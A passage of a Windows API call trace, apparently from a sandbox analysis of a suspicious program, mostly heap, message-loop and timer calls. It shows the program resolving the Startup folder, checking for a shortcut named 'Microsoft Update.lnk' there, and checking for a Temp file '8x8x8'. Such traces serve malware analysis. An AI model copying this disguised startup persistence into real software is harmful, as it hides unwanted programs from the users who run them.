dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0244.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866a20 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38656b8 | out: hHeap=0x2af0000) returned 1 [0244.841] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.841] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0244.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0244.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0244.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0244.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0244.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866a20 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0244.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0244.843] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0244.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0244.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0244.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0244.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0244.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0244.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0244.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0244.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0244.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0244.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0244.844] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0244.844] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0244.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0244.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.845] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0244.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0244.845] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0244.845] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0244.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0244.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0244.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0244.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0244.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0244.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0244.846] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0244.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0244.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0244.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0244.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0244.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0244.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0244.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0244.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0244.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0244.846] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0244.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0244.846] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0244.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0244.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0244.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0244.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0244.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0244.847] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0244.847] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.847] timeGetTime () returned 0x117d1cb [0244.847] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.847] Sleep (dwMilliseconds=0xa) [0244.917] timeGetTime () returned 0x117d219 [0244.917] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.917] Sleep (dwMilliseconds=0xa) [0244.966] timeGetTime () returned 0x117d248 [0244.966] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.967] Sleep (dwMilliseconds=0xa) [0245.016] timeGetTime () returned 0x117d277 [0245.016] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0245.016] TranslateMessage (lpMsg=0x8cf798) returned 0 [0245.016] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0245.016] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0245.017] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0245.017] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.017] Sleep (dwMilliseconds=0xa) [0245.063] timeGetTime () returned 0x117d2b5 [0245.088] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.088] Sleep (dwMilliseconds=0xa) [0245.143] timeGetTime () returned 0x117d2f4 [0245.143] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.143] Sleep (dwMilliseconds=0xa) [0245.176] timeGetTime () returned 0x117d313 [0245.176] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.176] Sleep (dwMilliseconds=0xa) [0245.211] timeGetTime () returned 0x117d333 [0245.211] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.211] Sleep (dwMilliseconds=0xa) [0245.271] timeGetTime () returned 0x117d371 [0245.271] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.271] Sleep (dwMilliseconds=0xa) [0245.351] timeGetTime () returned 0x117d3bf [0245.351] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.352] Sleep (dwMilliseconds=0xa) [0245.386] timeGetTime () returned 0x117d3ee [0245.386] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.386] Sleep (dwMilliseconds=0xa) [0245.403] timeGetTime () returned 0x117d3fe [0245.403] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.403] Sleep (dwMilliseconds=0xa) [0245.418] timeGetTime () returned 0x117d40d [0245.418] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.418] Sleep (dwMilliseconds=0xa) [0245.445] timeGetTime () returned 0x117d41d [0245.445] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.445] Sleep (dwMilliseconds=0xa) [0245.468] timeGetTime () returned 0x117d43c [0245.468] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.468] Sleep (dwMilliseconds=0xa) [0245.486] timeGetTime () returned 0x117d44c [0245.486] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.486] Sleep (dwMilliseconds=0xa) [0245.511] timeGetTime () returned 0x117d46b [0245.511] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.511] Sleep (dwMilliseconds=0xa) [0245.526] timeGetTime () returned 0x117d47b [0245.526] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.526] Sleep (dwMilliseconds=0xa) [0245.557] timeGetTime () returned 0x117d49a [0245.557] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.557] Sleep (dwMilliseconds=0xa) [0245.573] timeGetTime () returned 0x117d4aa [0245.573] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.573] Sleep (dwMilliseconds=0xa) [0245.590] timeGetTime () returned 0x117d4b9 [0245.590] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.590] Sleep (dwMilliseconds=0xa) [0245.604] timeGetTime () returned 0x117d4c9 [0245.604] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.604] Sleep (dwMilliseconds=0xa) [0245.620] timeGetTime () returned 0x117d4d8 [0245.620] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.620] Sleep (dwMilliseconds=0xa) [0245.643] timeGetTime () returned 0x117d4e8 [0245.643] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.643] Sleep (dwMilliseconds=0xa) [0245.666] timeGetTime () returned 0x117d507 [0245.666] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.666] Sleep (dwMilliseconds=0xa) [0245.682] timeGetTime () returned 0x117d517 [0245.682] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.682] Sleep (dwMilliseconds=0xa) [0245.698] timeGetTime () returned 0x117d527 [0245.698] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.698] Sleep (dwMilliseconds=0xa) [0245.713] timeGetTime () returned 0x117d536 [0245.713] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.713] Sleep (dwMilliseconds=0xa) [0245.729] timeGetTime () returned 0x117d546 [0245.729] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.729] Sleep (dwMilliseconds=0xa) [0245.776] timeGetTime () returned 0x117d575 [0245.776] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0245.776] TranslateMessage (lpMsg=0x8cf798) returned 0 [0245.776] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0245.776] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0245.776] 